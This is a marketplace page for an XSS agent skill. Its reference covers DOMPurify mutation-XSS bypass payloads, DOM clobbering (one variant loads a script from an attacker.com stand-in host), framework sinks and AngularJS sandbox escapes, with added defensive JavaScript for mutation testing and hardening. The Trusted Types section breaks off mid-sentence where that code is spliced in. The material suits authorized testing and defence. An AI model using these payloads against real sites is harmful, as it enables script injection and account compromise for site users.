
Xss Cross Site Scripting
Load advanced XSS reference patterns—mXSS, DOM clobbering, Trusted Types bypass, Service Worker persistence—when hardening or pentesting web apps beyond basic reflected XSS checks.
Overview
XSS Cross-Site Scripting is an agent skill for the Ship phase that supplies advanced XSS and mXSS techniques and sanitizer-bypass patterns for authorized application security testing.
Install
npx skills add https://github.com/yaklang/hack-skills --skill xss-cross-site-scripting
What is this skill?
- mXSS mechanics: sanitizer vs browser re-parse via innerHTML mutation
- DOMPurify bypass families: MathML/SVG namespace confusion, noscript parsing differential, form/table restructuring
- Modern vectors: DOM Clobbering, Trusted Types bypass angles, Service Worker persistence (per supplementary reference sco
- Explicit test loop: sanitizer output → innerHTML assignment → inspect live DOM
- Supplementary SKILL load trigger for agents already running XSS assessments
Adoption & trust: 1.2k installs on skills.sh; 980 GitHub stars; 0/3 security scanners passed (skills.sh audits).
What problem does it solve?
Your app uses a popular sanitizer, but you do not know whether the browser's re-parse on `innerHTML` assignment can still mutate the sanitized markup into executable XSS.
Who is it for?
Solo builders shipping web apps with user HTML, WYSIWYG, or complex DOM frameworks who run authorized security reviews.
Skip if: Unauthorized targeting of third-party sites, or teams that only need high-level OWASP cheat sheets without exploit-level detail.
When should I use this skill?
When the agent needs modern framework XSS, mXSS, DOM Clobbering, Trusted Types bypass, or Service Worker persistence techniques beyond the core SKILL.md.
What do I get? / Deliverables
Your agent applies documented mXSS and framework-specific bypass patterns in a structured test loop so you can patch sanitization, CSP, or Trusted Types before launch.
- Documented XSS/mXSS test cases aligned to app sinks
- Sanitizer-vs-browser differential reproduction steps
- Remediation notes for parsing, CSP, or Trusted Types gaps
How it compares
Depth reference for agent-led pentest workflows, not a passive dependency scanner or WAF configuration skill.
Common Questions / FAQ
Who is xss-cross-site-scripting for?
Developers and security-minded solo builders who test their own SaaS, APIs with HTML surfaces, or extensions under explicit authorization.
When should I use xss-cross-site-scripting?
During ship security review when validating sanitizers, SPAs, or rich text—especially before launch when DOM mutation and DOMPurify differentials matter.
Is xss-cross-site-scripting safe to install?
The content describes offensive security techniques; only use on systems you own or have permission to test, and review the Security Audits panel on this Prism page before install.
SKILL.md - Xss Cross Site Scripting
# Advanced XSS Tricks — Supplementary Reference

> **Load trigger**: When the agent needs modern framework XSS, mXSS, DOM Clobbering, Trusted Types bypass, or Service Worker persistence techniques beyond the core SKILL.md.

## 1. mXSS (Mutation XSS)

The browser's HTML parser "fixes" malformed markup differently than the sanitizer expected, so markup that was benign in the sanitizer's tree mutates into an executable payload after DOM insertion.

### Core Mechanism

Sanitizer parses HTML → serializes safe output → browser re-parses the string during `innerHTML` assignment → the second parse builds a different tree, and that mutation yields an executable node.

### DOMPurify Bypass Patterns

**Namespace confusion (SVG/MathML → HTML back-context):**

```html
<math><mtext><table><mglyph><style><!--</style><img title="--></mglyph><img src=1 onerror=alert(1)>">
```

`<mtext>` is a MathML text integration point, so `<table>` is parsed as HTML and `<mglyph>`, foster-parented out of the table, lands in the HTML namespace, where `<style>` is raw text that swallows everything up to `</style>`; the sanitizer sees only an `<img>` with a `title`. On re-parse of the serialized output `<mglyph>` sits directly under `<mtext>` and becomes a MathML element, `<style>` is no longer raw text, `<!--` opens a comment that ends inside the `title` value, and the second `<img>` becomes a live HTML element.

**`<noscript>` parsing differential:**

```html
<noscript><style></noscript><img src=x onerror=alert(1)>
```

DOMPurify parses with `DOMParser`, which has scripting disabled, so `<noscript>` content is parsed as normal HTML and `<style>` consumes the rest of the string as text. The live page has scripting enabled, so `<noscript>` is raw text that ends at `</noscript>`, and the `<img>` is parsed as a live sibling.

**Form/table restructuring:**

```html
<form><math><mtext></form><form><mglyph><svg><mpath><set attributeName=onmouseover to=alert(1)>
```

The `</form>` inside `<mtext>` clears the parser's form element pointer while the `<math>` subtree stays open inside the first form, so the second `<form>` is created nested inside it. On re-parse the nested `<form>` start tag is ignored (a form is already open), its children move up into `<mtext>`, and `<mglyph>` changes namespace, so what was inert text on the first parse becomes live markup.

### Key Principle

Test with: sanitizer output → `element.innerHTML = sanitized` → inspect the actual DOM. If the live DOM differs from the tree the sanitizer produced, mutation XSS is possible. Repeat the round trip: markup that keeps changing under serialize-and-reparse has not reached a fixed point and needs a closer look.

---

## 2. DOM Clobbering

Override JavaScript variables/properties by injecting HTML elements with specific `id` or `name` attributes.
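Before the clobbering material, the sanitizer → `innerHTML` → live DOM loop from "Key Principle" in section 1, as an added example in JavaScript. This is not code from the yaklang/hack-skills reference. It assumes a `sanitize` function such as `DOMPurify.sanitize`, two round-trips through the browser's parser (a `DOMParser` view with scripting disabled, which is what DOMPurify sees, and a live `innerHTML` assignment with scripting enabled, which is what the sink sees), and a constructed payload list taken from the three patterns above; `findLiveSinks`, `mutationCheck` and `runCorpus` are names chosen here.

```javascript
// Added example (not the skill's own code): the sanitizer -> innerHTML -> live DOM
// differential loop from section 1. Assumptions: `sanitize` is any sanitizer such as
// DOMPurify.sanitize; the two browser views below reproduce DOMPurify's DOMParser
// (scripting disabled) and a real innerHTML assignment (scripting enabled).

// Tags and URL-bearing attributes whose presence in the re-parsed tree means the
// sanitized markup became executable or attacker-loadable after the re-parse.
const EXEC_TAGS = new Set(['script', 'iframe', 'object', 'embed']);
const URL_ATTRS = new Set(['href', 'src', 'action', 'formaction', 'xlink:href']);

// Drop the ASCII control/space characters the URL parser ignores, so that
// "java\tscript:" and " javascript:" are both recognised as the javascript: scheme.
function normaliseScheme(value) {
  return String(value).replace(/[\u0000-\u0020]/g, '').toLowerCase();
}

// Walk a DOM subtree and collect nodes that would execute. Works on a real DOM
// (Element.attributes / childNodes) or on any object with the same shape.
function findLiveSinks(root) {
  const hits = [];
  const walk = (node) => {
    if (node.tagName) {
      const tag = node.tagName.toLowerCase();
      if (EXEC_TAGS.has(tag)) hits.push(`<${tag}>`);
      for (const attr of Array.from(node.attributes || [])) {
        const name = attr.name.toLowerCase();
        const value = normaliseScheme(attr.value);
        if (name.startsWith('on')) hits.push(`<${tag} ${name}>`);
        else if (URL_ATTRS.has(name) && /^(javascript|vbscript|data):/.test(value)) {
          hits.push(`<${tag} ${name}=${value.split(':')[0]}:>`);
        }
      }
    }
    for (const child of Array.from(node.childNodes || [])) walk(child);
  };
  walk(root);
  return hits;
}

// Core loop. Each view is a string -> string round-trip through a parser. The
// sanitized string is pushed through each view until it stops changing (a fixed
// point). Any change is a mutation; differing fixed points between the views is a
// sanitizer-vs-browser differential; `parse` turns a string into a tree so the
// final DOM can be inspected for live sinks.
function mutationCheck(payload, sanitize, views, parse, maxRounds = 4) {
  const sanitized = sanitize(payload);
  const report = { payload, sanitized, mutated: false, differential: false, sinks: [] };
  const finals = {};
  for (const [name, roundTrip] of Object.entries(views)) {
    let current = sanitized;
    for (let i = 0; i < maxRounds; i++) {
      const next = roundTrip(current);
      if (next === current) break;
      report.mutated = true;
      current = next;
    }
    finals[name] = current;
    for (const sink of findLiveSinks(parse(current))) report.sinks.push(`${name}: ${sink}`);
  }
  report.differential = new Set(Object.values(finals)).size > 1;
  return report;
}

// Browser-only plumbing (null when there is no DOM, e.g. under Node).
// sanitizerView: what DOMPurify's DOMParser sees, scripting disabled, so <noscript>
// content is parsed as HTML. sinkView: a real `el.innerHTML = sanitized` in the live
// page, scripting enabled. A detached <div> still loads <img src> and fires onerror,
// so give test payloads harmless handlers (e.g. a marker assignment) before running.
const browserViews = typeof document === 'undefined' ? null : {
  sanitizerView: (html) => new DOMParser().parseFromString(html, 'text/html').body.innerHTML,
  sinkView: (html) => { const el = document.createElement('div'); el.innerHTML = html; return el.innerHTML; },
};
const parseLive = (html) => { const el = document.createElement('div'); el.innerHTML = html; return el; };

// Constructed corpus: the three payload families from section 1.
const MXSS_PAYLOADS = [
  '<math><mtext><table><mglyph><style><!--</style><img title="--></mglyph><img src=1 onerror=alert(1)>">',
  '<noscript><style></noscript><img src=x onerror=alert(1)>',
  '<form><math><mtext></form><form><mglyph><svg><mpath><set attributeName=onmouseover to=alert(1)>',
];

// In the browser console of the page under test: runCorpus(DOMPurify.sanitize)
function runCorpus(sanitize, views = browserViews, parse = parseLive) {
  return MXSS_PAYLOADS.map((payload) => mutationCheck(payload, sanitize, views, parse));
}
```

Read each report's `mutated`, `differential` and `sinks` fields: `differential: true` on the `<noscript>` payload is exactly the scripting-on/scripting-off split described above, and any entry under `sinks` for `sinkView` is a node that reached the live DOM. A corpus of three payloads proves nothing about other inputs, so extend `MXSS_PAYLOADS` with the markup the application actually accepts.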
### Basic Clobbering

```html
<!-- Clobber window.x -->
<img id=x>
<!-- Now window.x === the <img> element -->

<!-- Clobber nested: window.x.y (a form's named getter covers its controls and <img> descendants) -->
<form id=x><img id=y></form>
<!-- window.x.y === the <img> element -->

<!-- Clobber window.x with a string value via <a> href (toString() returns the href) -->
<a id=x href="javascript:alert(1)">
<!-- String(window.x) === "javascript:alert(1)" -->
```

### HTMLCollection Clobbering (array-like)

```html
<a id=x>1</a><a id=x>2</a>
<!-- window.x is an HTMLCollection [a, a] -->
<!-- window.x[0], window.x[1] accessible; window.x.length === 2 -->
```

### Deep Property Clobbering (3+ levels)

A collection's named getter also resolves `name` attributes, which gives the second level; the anchor's `toString()` gives the third:

```html
<a id=x><a id=x name=y href="javascript:alert(1)">
<!-- window.x is an HTMLCollection, window.x.y is the second <a>, String(window.x.y) === "javascript:alert(1)" -->
```

### Exploit Patterns

If code does `if (window.config) { script.src = window.config.url; }` and `config` is never defined:

```html
<a id=config><a id=config name=url href="https://attacker.com/evil.js">
```

`window.config` is now a truthy HTMLCollection, `window.config.url` is the second anchor, and assigning it to `src` stringifies it to its `href`, so the attacker-controlled script loads.

### Defense Check

Guards such as `typeof x !== 'undefined'`, `if (x)` or `x instanceof Object` are satisfied by clobbered values, because elements and HTMLCollections are objects. Check the prototype or the concrete type instead, or avoid reading configuration from global names at all.

---

## 3. Modern Framework XSS

### React

- `dangerouslySetInnerHTML={{__html: userInput}}` — direct XSS if `userInput` is unsanitized
- `href={userInput}` on `<a>` — `javascript:` URLs are rendered as given (recent versions only log a warning)
- SSR hydration mismatch — server renders different HTML than the client expects; dangling markup possible
- `eval()` in `useEffect` with user data

### Vue.js

- `v-html="userInput"` — equivalent to `innerHTML`, no sanitization
- Server-side template injection when user input is compiled into a `{{ }}` template in SSR mode
- `v-bind:href` / `:href` accepts `javascript:` URIs
- Component `is` attribute with user input → dynamic component injection

### Angular

- `bypassSecurityTrustHtml()` / `bypassSecurityTrustUrl()` — explicit trust marking
- Angular Universal SSR template injection
- `[innerHTML]` binding with a bypassed sanitizer
- Older AngularJS (1.x) sandbox escapes still relevant for legacy apps:

```
{{constructor.constructor('alert(1)')()}}
{{'a]'.constructor.prototype.charAt=[].join;$eval('x=1}alert(1)//')}}
```

### Next.js / Nuxt

- `getServerSideProps` returning unsanitized data rendered with `dangerouslySetInnerHTML`
- API routes reflecting input without encoding
- `_document.js` custom head injection

---

## 4. Trusted Types Bypass

Trusted Types enforce that DOM XSS sinks only
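For sections 2 and 3 above, an added example in JavaScript that is not code from the yaklang/hack-skills reference: the clobberable `window.config` lookup from the section 2 exploit pattern next to a hardened version, and a scheme allow-list for the framework `href` sinks listed in section 3. `win` stands in for `window`, the collection and anchor objects in the test mimic what `<a id=config><a id=config name=url href=...>` puts on the global object, and the function names (`scriptUrlVulnerable`, `scriptUrlHardened`, `safeHref`) and the `https://app.example/` base are chosen here.

```javascript
// Added example for sections 2 and 3 (not the skill's own code). `win` stands in for
// `window`; the collection/anchor objects used in the tests mimic what
// `<a id=config><a id=config name=url href="https://attacker.example/evil.js">`
// puts on the global object. Function names are chosen here.

// Section 2, the vulnerable pattern: `if (window.config)` is true for a clobbered
// HTMLCollection, `config.url` resolves via the collection's named getter to the
// second <a>, and assigning it to script.src stringifies it to its href. A
// `typeof config !== 'undefined'` or `config instanceof Object` guard passes as well.
function scriptUrlVulnerable(win) {
  if (win.config) return String(win.config.url);
  return '/static/app.js';
}

// A genuine config object is a plain object (prototype Object.prototype); anything
// the parser created (elements, HTMLCollection, an iframe's WindowProxy) is not.
function isPlainObject(v) {
  return v !== null && typeof v === 'object' && Object.getPrototypeOf(v) === Object.prototype;
}

// Hardened: only accept a plain object with a string `url` as its own property. The
// own-property check means a named-getter lookup on a DOM collection can never
// satisfy it. Better still is to not read the URL from a global name at all.
function scriptUrlHardened(win) {
  const cfg = win.config;
  if (isPlainObject(cfg) && Object.prototype.hasOwnProperty.call(cfg, 'url') && typeof cfg.url === 'string') {
    return cfg.url;
  }
  return '/static/app.js';
}

// Section 3: React's href={userInput} and Vue's :href render javascript: URLs as
// given. Parse with the WHATWG URL parser, which strips the tabs/newlines and
// leading whitespace browsers also ignore, then allow-list the scheme. `base`
// stands in for the document origin (assumption); relative links resolve against
// it and, when they pass, are returned verbatim.
const SAFE_SCHEMES = new Set(['http:', 'https:', 'mailto:', 'tel:']);
function safeHref(input, base = 'https://app.example/') {
  let parsed;
  try {
    parsed = new URL(String(input), base);
  } catch {
    return 'about:blank'; // unparsable: never hand it to the DOM
  }
  return SAFE_SCHEMES.has(parsed.protocol) ? String(input) : 'about:blank';
}
```

In a React component the sink becomes `<a href={safeHref(userInput)}>`, and the same guard belongs in front of Vue's `:href`; the prototype check in `scriptUrlHardened` is a containment measure, the real fix for clobbering is initialising configuration before any untrusted HTML is parsed and not resolving it through global names.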